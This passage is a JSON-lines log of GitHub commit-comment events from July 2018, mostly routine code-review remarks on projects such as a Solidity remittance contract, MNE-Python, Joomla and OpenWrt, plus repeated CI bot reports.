{"id":"7969577112","type":"CommitCommentEvent","actor":{"login":"YcherishY"},"repo":{"name":"YcherishY/linux"},"payload":{"comment":{"id":29717761,"position":null,"line":null,"path":null,"commit_id":"e503c4cd28d0a6175506abf30a95c391736390d8","created_at":"2018-07-16T09:33:53Z","updated_at":"2018-07-16T09:33:53Z","author_association":"OWNER","body":"图片"}},"created_at":"2018-07-16T09:33:53Z"}
{"id":"7969577146","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717762,"position":41,"line":42,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:33:54Z","updated_at":"2018-07-16T09:33:54Z","author_association":"NONE","body":"Yes, here you know that this is the first payment. But to be strict, should you not call `instance.payments(aux)`? After all this is **exactly** the id of the payment you created.\r\nThink further when you create a UI. There may be many payments created in a single block. How do you know which one is yours? `aux`!\r\nOh! and rename `let aux` to something expressive."}},"created_at":"2018-07-16T09:33:54Z"}
{"id":"7969578517","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717765,"position":35,"line":37,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:34:13Z","updated_at":"2018-07-16T09:34:13Z","author_association":"NONE","body":"I am talking about this `aux` below."}},"created_at":"2018-07-16T09:34:13Z"}
{"id":"7969580815","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717771,"position":63,"line":50,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:34:42Z","updated_at":"2018-07-16T09:34:42Z","author_association":"NONE","body":"More expressive?"}},"created_at":"2018-07-16T09:34:42Z"}
{"id":"7969581832","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717775,"position":63,"line":50,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:34:56Z","updated_at":"2018-07-16T09:34:56Z","author_association":"NONE","body":"`expectedFee`?"}},"created_at":"2018-07-16T09:34:56Z"}
{"id":"7969582522","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717777,"position":62,"line":49,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:35:07Z","updated_at":"2018-07-16T09:35:07Z","author_association":"NONE","body":"`actualFee`?"}},"created_at":"2018-07-16T09:35:07Z"}
{"id":"7969587259","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717785,"position":87,"line":61,"path":"test/Remittance.js","commit_id":"f0ba5fbb23339abefb7975d5beee2f9dabd73ffc","created_at":"2018-07-16T09:36:07Z","updated_at":"2018-07-16T09:36:07Z","author_association":"NONE","body":"`txObj =>` then save the payment id."}},"created_at":"2018-07-16T09:36:07Z"}
{"id":"7969587781","type":"CommitCommentEvent","actor":{"login":"GitPaulo"},"repo":{"name":"GitPaulo/PMETASTRUCT"},"payload":{"comment":{"id":29717786,"position":null,"line":null,"path":null,"commit_id":"a3b392bc3bc444da788bba365ad7b88494923413","created_at":"2018-07-16T09:36:13Z","updated_at":"2018-07-16T09:36:13Z","author_association":"OWNER","body":":3"}},"created_at":"2018-07-16T09:36:13Z"}
{"id":"7969588903","type":"CommitCommentEvent","actor":{"login":"csthomas"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29717790,"position":95,"line":168,"path":"libraries/src/Session/MetadataManager.php","commit_id":"6bc07106cdb153b91f7d56ebf71d40f04c9fb25c","created_at":"2018-07-16T09:36:27Z","updated_at":"2018-07-16T09:36:27Z","author_association":"CONTRIBUTOR","body":"I'm not 100% sure, but keep in mind that this change may will not work on postgresql because the `time` column is varchar.\r\n\r\nProbably you get: \"ERROR: operator does not exist: character varying < integer Hint: No operator matches the given name and argument type(s). You might need to add explicit type casts.\"\r\n\r\nI made a quick test at http://sqlfiddle.com/#!17/102e1/3"}},"created_at":"2018-07-16T09:36:27Z"}
{"id":"7969591946","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717799,"position":98,"line":86,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:37:06Z","updated_at":"2018-07-16T09:37:06Z","author_association":"NONE","body":"At some point, also test the new storage state of `payment`."}},"created_at":"2018-07-16T09:37:06Z"}
{"id":"7969592449","type":"CommitCommentEvent","actor":{"login":"Py9595"},"repo":{"name":"Py9595/token-profile"},"payload":{"comment":{"id":29717801,"position":9,"line":9,"path":"erc20/0x01db18f6a474840db3480a6a35227d4d0dfcca37.json","commit_id":"708c76c3d62d35acfe092be7d1a88aad4e113007","created_at":"2018-07-16T09:37:12Z","updated_at":"2018-07-16T09:37:12Z","author_association":"OWNER","body":"dsdddd"}},"created_at":"2018-07-16T09:37:12Z"}
{"id":"7969593566","type":"CommitCommentEvent","actor":{"login":"manojtcs"},"repo":{"name":"manojtcs/helloworld"},"payload":{"comment":{"id":29717803,"position":null,"line":null,"path":null,"commit_id":"b802cccd34f1650e0d25d0b4218b73c61643f258","created_at":"2018-07-16T09:37:25Z","updated_at":"2018-07-16T09:37:25Z","author_association":"OWNER","body":"Checking for the notification"}},"created_at":"2018-07-16T09:37:25Z"}
{"id":"7969595588","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717808,"position":89,"line":77,"path":"test/Remittance.js","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T09:37:52Z","updated_at":"2018-07-16T09:37:52Z","author_association":"NONE","body":"`new BigNumber(txObj.receipt.gasUsed).times(gasPrice)` works in more situations."}},"created_at":"2018-07-16T09:37:52Z"}
{"id":"7969595718","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"NytroCO/NuVotifier"},"payload":{"comment":{"id":29717809,"position":null,"line":null,"path":null,"commit_id":"57ab4e6fcffefb2475ef9f5392ab00f77d7f976e","created_at":"2018-07-16T09:37:54Z","updated_at":"2018-07-16T09:37:54Z","author_association":"NONE","body":"@Time6628 Is your fork stable for production use and replacement of official nuVotifier? :o "}},"created_at":"2018-07-16T09:37:54Z"}
{"id":"7969596897","type":"CommitCommentEvent","actor":{"login":"pmurias"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29717815,"position":12,"line":124,"path":"src/vm/jvm/Truffle.nqp","commit_id":"0d726f8b05c86ff5d63fe459fde2c97753e7283a","created_at":"2018-07-16T09:38:08Z","updated_at":"2018-07-16T09:38:08Z","author_association":"CONTRIBUTOR","body":"$label will be used for the loop label LOOP_LABEL: while ... {...}"}},"created_at":"2018-07-16T09:38:08Z"}
{"id":"7969600107","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29717824,"position":27,"line":192,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T09:38:46Z","updated_at":"2018-07-16T09:38:46Z","author_association":"OWNER","body":"thinking about it I would do something like:\r\n\r\n```\r\nclass Toto(object):\r\n    \"\"\"docstring for Toto\"\"\"\r\n    def __init__(self, param1, param2):\r\n        self.param1 = param1\r\n        self.param2 = param2\r\n\r\n\r\ndef read_toto(fname):\r\n    param1 = read1_from_fname(fname)\r\n    param2 = read2_from_fname(fname)\r\n    params = read_rest_from_fname(fname)\r\n    toto = Toto(param1, param2)\r\n    toto.params.udpate(params)\r\n```\r\n\r\ndo you think it can fly?"}},"created_at":"2018-07-16T09:38:46Z"}
{"id":"7969601257","type":"CommitCommentEvent","actor":{"login":"kapoorsanj"},"repo":{"name":"kapoorsanj/First_Class"},"payload":{"comment":{"id":29717826,"position":3,"line":2,"path":"addTwo.py","commit_id":"8b140be2f9f6415e5bde49fca22a532922067139","created_at":"2018-07-16T09:38:58Z","updated_at":"2018-07-16T09:38:58Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-16T09:38:58Z"}
{"id":"7969601861","type":"CommitCommentEvent","actor":{"login":"pmurias"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29717827,"position":8,"line":120,"path":"src/vm/jvm/Truffle.nqp","commit_id":"0d726f8b05c86ff5d63fe459fde2c97753e7283a","created_at":"2018-07-16T09:39:05Z","updated_at":"2018-07-16T09:39:05Z","author_association":"CONTRIBUTOR","body":"It's not yet used, it's been copied over for later use when our while implementation is expanded."}},"created_at":"2018-07-16T09:39:05Z"}
{"id":"7969604276","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29717830,"position":103,"line":294,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T09:39:28Z","updated_at":"2018-07-16T09:39:28Z","author_association":"OWNER","body":"it would be consistent with current and historical behavior"}},"created_at":"2018-07-16T09:39:28Z"}
{"id":"7969606663","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"marotear/Stockfish"},"payload":{"comment":{"id":29717836,"position":null,"line":null,"path":null,"commit_id":"35d50a64974f32f307e90a61bda39a21a0d32b12","created_at":"2018-07-16T09:39:58Z","updated_at":"2018-07-16T09:39:58Z","author_association":"NONE","body":"@marotear \r\nInteresting idea. you should try to double the effect by adding `2*quietsCnt`.\r\n\r\nAnother idea could be to scale quietsCnt with the size of the bonus itself, par example like this:\r\n`quietsCnt * bonus / 10272`"}},"created_at":"2018-07-16T09:39:58Z"}
{"id":"7969608267","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717839,"position":4,"line":31,"path":"src/main/java/abc/Student.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:40:18Z","updated_at":"2018-07-16T09:40:18Z","author_association":"COLLABORATOR","body":"Add @Override of equals/hashcode/toString to basic entity"}},"created_at":"2018-07-16T09:40:18Z"}
{"id":"7969609610","type":"CommitCommentEvent","actor":{"login":"rouazana"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":29717842,"position":18,"line":93,"path":"server/protocols/jmap-integration-testing/jmap-integration-testing-common/src/test/java/org/apache/james/jmap/methods/integration/cucumber/SetMailboxesMethodStepdefs.java","commit_id":"6dbb2f6a53ad761bfc1b79835f0936f9569c935d","created_at":"2018-07-16T09:40:34Z","updated_at":"2018-07-16T09:40:34Z","author_association":"MEMBER","body":"I'm more concerned by this code. Why can't you catch (and ignore) already create exception?"}},"created_at":"2018-07-16T09:40:34Z"}
{"id":"7969610304","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29717845,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T09:40:43Z","updated_at":"2018-07-16T09:40:43Z","author_association":"OWNER","body":"Maybe I am wrong but I had the impression that SourceMorph was always making use of the precomputed way of morphing surface data."}},"created_at":"2018-07-16T09:40:43Z"}
{"id":"7969613265","type":"CommitCommentEvent","actor":{"login":"chiSaoKao"},"repo":{"name":"2017-SP-CS410/Simple-Tetris"},"payload":{"comment":{"id":29717850,"position":53,"line":248,"path":"Tetris/src/tetris/Tetromino.java","commit_id":"4cdaea79a5013b19c15bacfaba20d968a866a744","created_at":"2018-07-16T09:41:21Z","updated_at":"2018-07-16T09:41:21Z","author_association":"NONE","body":"fist look the code,just wondrful"}},"created_at":"2018-07-16T09:41:21Z"}
{"id":"7969613445","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29717851,"position":14,"line":1893,"path":"mne/source_estimate.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T09:41:23Z","updated_at":"2018-07-16T09:41:23Z","author_association":"OWNER","body":"ok let's decide later."}},"created_at":"2018-07-16T09:41:23Z"}
{"id":"7969615144","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29717854,"position":19,"line":33,"path":"contracts/Splitter.sol","commit_id":"3513d5615032f53cf0efb7fbb5c7bc05b1398ff3","created_at":"2018-07-16T09:41:44Z","updated_at":"2018-07-16T09:41:44Z","author_association":"NONE","body":"Can you rename it to something more expressive and move it up 1 line so that you `aux > 0`?\r\nThis will save you gas: only 1 storage read instead of 2."}},"created_at":"2018-07-16T09:41:44Z"}
{"id":"7969619811","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29717860,"position":37,"line":2335,"path":"mne/source_estimate.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T09:42:43Z","updated_at":"2018-07-16T09:42:43Z","author_association":"OWNER","body":"well a surface based estimate you should not need to specify a src so:\r\n\r\n`stc_to = SourceMorph()(stc_from)`\r\n\r\ncan work.\r\n\r\n"}},"created_at":"2018-07-16T09:42:43Z"}
{"id":"7969620912","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29717862,"position":null,"line":null,"path":null,"commit_id":"c724beabad9710fff25a2cfc822abb5a3291c6a0","created_at":"2018-07-16T09:42:56Z","updated_at":"2018-07-16T09:42:56Z","author_association":"OWNER","body":"So, this code snippet allows the user to voluntarily add some resource into the cache so that it can be accessed when offline. **HOW** does it work?\r\nwhen the save button is clicked, the onsavebuttonclicked function will be triggered with the 'click' even\r\nthis in turn will open up the cache and simply add the resources in to it \r\nOne interesting thing to note here is that cache api is globally available to all the modules of your project, that is why we were able to access it voluntarily, any time , any where. "}},"created_at":"2018-07-16T09:42:56Z"}
{"id":"7969622072","type":"CommitCommentEvent","actor":{"login":"convaly"},"repo":{"name":"convaly/gaps"},"payload":{"comment":{"id":29717864,"position":null,"line":null,"path":null,"commit_id":"851e70b46417c4fd2ab2e7d589faf4e62ca66e53","created_at":"2018-07-16T09:43:11Z","updated_at":"2018-07-16T09:43:11Z","author_association":"OWNER","body":"If credentials do not exist they are created on execution, prompting log in window for gcalendar."}},"created_at":"2018-07-16T09:43:11Z"}
{"id":"7969624703","type":"CommitCommentEvent","actor":{"login":"donapieppo"},"repo":{"name":"plataformatec/simple_form"},"payload":{"comment":{"id":29717867,"position":200,"line":169,"path":"lib/generators/simple_form/templates/config/initializers/simple_form_bootstrap.rb","commit_id":"1cb66eb86bc44dfeabe6c7afe955dc59c9773592","created_at":"2018-07-16T09:43:43Z","updated_at":"2018-07-16T09:43:43Z","author_association":"NONE","body":"Label is already present because of line 164 (`ba.use :label_text`). It seams to me that this `bb.use :label` is redundant"}},"created_at":"2018-07-16T09:43:43Z"}
{"id":"7969626942","type":"CommitCommentEvent","actor":{"login":"KornbergFresnel"},"repo":{"name":"geek-ai/MAgent"},"payload":{"comment":{"id":29717877,"position":2,"line":99,"path":"doc/get_started.md","commit_id":"13ac2a9206183f357c42444df633ed7990dca216","created_at":"2018-07-16T09:44:12Z","updated_at":"2018-07-16T09:44:12Z","author_association":"COLLABORATOR","body":"NO, the instruction is correct logically."}},"created_at":"2018-07-16T09:44:12Z"}
{"id":"7969627274","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717878,"position":300,"line":133,"path":"src/main/java/abc/University.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:44:16Z","updated_at":"2018-07-16T09:44:16Z","author_association":"COLLABORATOR","body":"List<Integer> limitedList = new ArrayList<Integer>(mainList.subList(0,5));"}},"created_at":"2018-07-16T09:44:16Z"}
{"id":"7969627420","type":"CommitCommentEvent","actor":{"login":"Justice0909"},"repo":{"name":"hsalas/rotation_curves"},"payload":{"comment":{"id":29717883,"position":76,"line":73,"path":"code/rotation_curves.py","commit_id":"51d393033395be61e7c08cea74922740bd03b6e7","created_at":"2018-07-16T09:44:17Z","updated_at":"2018-07-16T09:44:17Z","author_association":"NONE","body":"raise ValueError(f'Directory {directory} does not exists.') won't work. Invalid Syntax        \r\n"}},"created_at":"2018-07-16T09:44:17Z"}
{"id":"7969633294","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29717901,"position":87,"line":66,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-16T09:45:22Z","updated_at":"2018-07-16T09:45:22Z","author_association":"NONE","body":"I am not sure why it is in this function. Typically, the setup phase should take care of it all. The setup is `sendRemitance`."}},"created_at":"2018-07-16T09:45:22Z"}
{"id":"7969635338","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29717904,"position":311,"line":144,"path":"src/main/java/abc/University.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:45:46Z","updated_at":"2018-07-16T09:45:46Z","author_association":"COLLABORATOR","body":"Enter 3 students in format FirstName, Surname, Group ....."}},"created_at":"2018-07-16T09:45:46Z"}
{"id":"7969637795","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29717907,"position":25,"line":22,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-16T09:46:18Z","updated_at":"2018-07-16T09:46:18Z","author_association":"NONE","body":"No worries. The syntax `it.skip(` and `it.only(` are more expressive."}},"created_at":"2018-07-16T09:46:18Z"}
{"id":"7969637854","type":"CommitCommentEvent","actor":{"login":"shanhuhai5739"},"repo":{"name":"Bytom-Community/Bytom-Server"},"payload":{"comment":{"id":29717908,"position":31,"line":166,"path":"api/transact.go","commit_id":"9a3d303a023ae05ac77a35258ee97916c7040a99","created_at":"2018-07-16T09:46:19Z","updated_at":"2018-07-16T09:46:19Z","author_association":"COLLABORATOR","body":"插入失败，要返回NewErrorResponse给前端"}},"created_at":"2018-07-16T09:46:19Z"}
{"id":"7969640342","type":"CommitCommentEvent","actor":{"login":"meleg"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29717925,"position":5,"line":84,"path":"src/method_iar_chebyshev.jl","commit_id":"d7e1566ebe64c782e77fce05f3c1f653cc858873","created_at":"2018-07-16T09:46:53Z","updated_at":"2018-07-16T09:46:53Z","author_association":"CONTRIBUTOR","body":"Fixed in 803e4e6d0c20e2d2857600641d6af7a124628535"}},"created_at":"2018-07-16T09:46:53Z"}
{"id":"7969646428","type":"CommitCommentEvent","actor":{"login":"zhangsd20"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29717942,"position":null,"line":null,"path":null,"commit_id":"609ce9abc0d1c10d00870b0ee9298034024b8b04","created_at":"2018-07-16T09:48:14Z","updated_at":"2018-07-16T09:48:14Z","author_association":"CONTRIBUTOR","body":" ar71xx:add support for E750G v8\r\n\r\nQxwlan E750G v8 is based on Qualcomm QCA9344.\r\n\r\nSpecification:\r\n\r\n560/450/225 MHz (CPU/DDR/AHB)\r\n128 MB of RAM (DDR2)\r\n8/16 MB of FLASH (SPI NOR)\r\n2T2R 2.4G GHz (AR9344)\r\n2x 10/100 Mbps Ethernet (PoE support)\r\n2x 10/100/1000 Mbps Ethernet\r\n7x LED (6 driven by GPIO)\r\n1x button (reset)\r\n1x DC jack for main power input (9-48 V)\r\nUART (J23) and LEDs (J2) headers on PCB\r\n\r\nFlash instruction (using U-Boot CLI and tftp server):\r\n\r\n - Configure PC with static IP 192.168.1.10 and tftp server.\r\n - Rename \"sysupgrade\" filename to \"firmware.bin\" and place it in tftp\r\n   server directory.\r\n - Connect PC with one of RJ45 ports, power up the board and press\r\n  \"enter\" key to access U-Boot CLI.\r\n - Use the following command to update the device to OpenWrt: \"run lfw\".\r\n\r\nFlash instruction (using U-Boot web-based recovery):\r\n\r\n - Configure PC with static IP 192.168.1.xxx(2-254)/24.\r\n - Connect PC with one of RJ45 ports, press the reset button, power up\r\n   the board and keep button pressed for around 6-7 seconds, until LEDs\r\n   start flashing.\r\n - Open your browser and enter 192.168.1.1, select \"sysupgrade\" image\r\n   and click the upgrade button.\r\n\r\nSigned-off-by: Peng Zhang <sd20@qxwlan.com>"}},"created_at":"2018-07-16T09:48:14Z"}
{"id":"7969651185","type":"CommitCommentEvent","actor":{"login":"SimonVrouwe"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":29717955,"position":null,"line":null,"path":null,"commit_id":"f2ffb6d03eb769b7327f322dcaad27c1a75221e2","created_at":"2018-07-16T09:49:13Z","updated_at":"2018-07-16T09:49:13Z","author_association":"CONTRIBUTOR","body":"@cdecker The smoothing of the default feerate at startup does give problems. This just closed all my channels with message: `update_fee 13278 outside range 253-4605` and `13278` is the 4th iteration of smoothed `default feerate`. Maybe it is wise to undo f2ffb6d03eb769b7327f322dcaad27c1a75221e2 for now or you can expecta lot of issue tickets about `update_fee ... outside range ...` messages. Until we find a way to prevent this defaulting of the feerate at startup.\r\n\r\nI should have tested this on a node with real channels and I apologize."}},"created_at":"2018-07-16T09:49:13Z"}
{"id":"7969655720","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29717966,"position":17,"line":17,"path":"contracts/Remittance.sol","commit_id":"f040eba728124d6baf71db5a0e88b0f4f78175c7","created_at":"2018-07-16T09:50:10Z","updated_at":"2018-07-16T09:50:10Z","author_association":"OWNER","body":"Unless I am missing out something fundamental (which could very well be the case) , that is precisely what I am trying to achieve: to validate what Bob is handing out (ether attached) matches what he said out loud (variable `_amount`). \r\n"}},"created_at":"2018-07-16T09:50:10Z"}
{"id":"7969662683","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29717975,"position":30,"line":28,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T09:51:40Z","updated_at":"2018-07-16T09:51:40Z","author_association":"NONE","body":"Instead of using 2 storage slots, `ethFunds` and `processed`, why not say `ethFunds == 0` as the test that it has been processed?\r\n\r\nYou see, the latent danger you have when using a \"side\" check is that you may forget to check `processed` and do a valid `someone.transfer(ethFunds)`. Dangerous. Unless the check was `ethFunds > 0`. \r\nWhat you have is a valid system that relies on the developer keeping in mind at all times that `processed` has to be checked. \r\nWhat I want you to have is a system that does not lose money if the developer forgot to check."}},"created_at":"2018-07-16T09:51:40Z"}
{"id":"7969663769","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29717982,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-16T09:51:55Z","updated_at":"2018-07-16T09:51:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:51:55Z"}
{"id":"7969664153","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29717983,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-16T09:52:00Z","updated_at":"2018-07-16T09:52:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:52:00Z"}
{"id":"7969668022","type":"CommitCommentEvent","actor":{"login":"paluh"},"repo":{"name":"khanage/purescript-indexed-monad"},"payload":{"comment":{"id":29717995,"position":null,"line":null,"path":null,"commit_id":"cf105603868fddc2bcc8eb14778aa8645599929f","created_at":"2018-07-16T09:52:49Z","updated_at":"2018-07-16T09:52:49Z","author_association":"NONE","body":"Hi,\r\n\r\nI think that `psc-package` is an alternative approach to bower, but not a strict \"successor\" of it. In my opinion  library should provide `bower.json` for people who are managing dependencies in this way.\r\n\r\nIt seems that most libraries provide `bower.json`. For example  `simple-json`: https://github.com/justinwoo/purescript-simple-json - @justinwoo is for sure big proponent of `psc-package` but he is maintaining `bower.json` there ;-)\r\n\r\nShould I provide a PR with tested `bower.json`?"}},"created_at":"2018-07-16T09:52:49Z"}
{"id":"7969669667","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718000,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-16T09:53:11Z","updated_at":"2018-07-16T09:53:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:53:11Z"}
{"id":"7969670979","type":"CommitCommentEvent","actor":{"login":"art3mist"},"repo":{"name":"art3mist/abramyan_book"},"payload":{"comment":{"id":29718003,"position":null,"line":null,"path":null,"commit_id":"5d21b888d528f2281d379afa40ebfd4629d56be9","created_at":"2018-07-16T09:53:28Z","updated_at":"2018-07-16T09:53:28Z","author_association":"OWNER","body":"Дан массив размера N. Заменить каждый элемент массива на среднее арифметическое этого элемента и его соседей.\r\nENG:\r\nGiven an array of size N. Replace each element of the array with the arithmetic mean of that element and its neighbors."}},"created_at":"2018-07-16T09:53:28Z"}
{"id":"7969671254","type":"CommitCommentEvent","actor":{"login":"wenyuan-ma"},"repo":{"name":"wenyuan-ma/hiredis-vip"},"payload":{"comment":{"id":29718005,"position":null,"line":null,"path":null,"commit_id":"91cbb016da19dc09ce7cf1371551f6940139a5bf","created_at":"2018-07-16T09:53:31Z","updated_at":"2018-07-16T09:53:31Z","author_association":"OWNER","body":"由于redis 3.0和4.0 的slots 返回的 api不一样， 修改为对于redis 3.0的cluster slots 命令支持。"}},"created_at":"2018-07-16T09:53:31Z"}
{"id":"7969675238","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718010,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-16T09:54:24Z","updated_at":"2018-07-16T09:54:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment 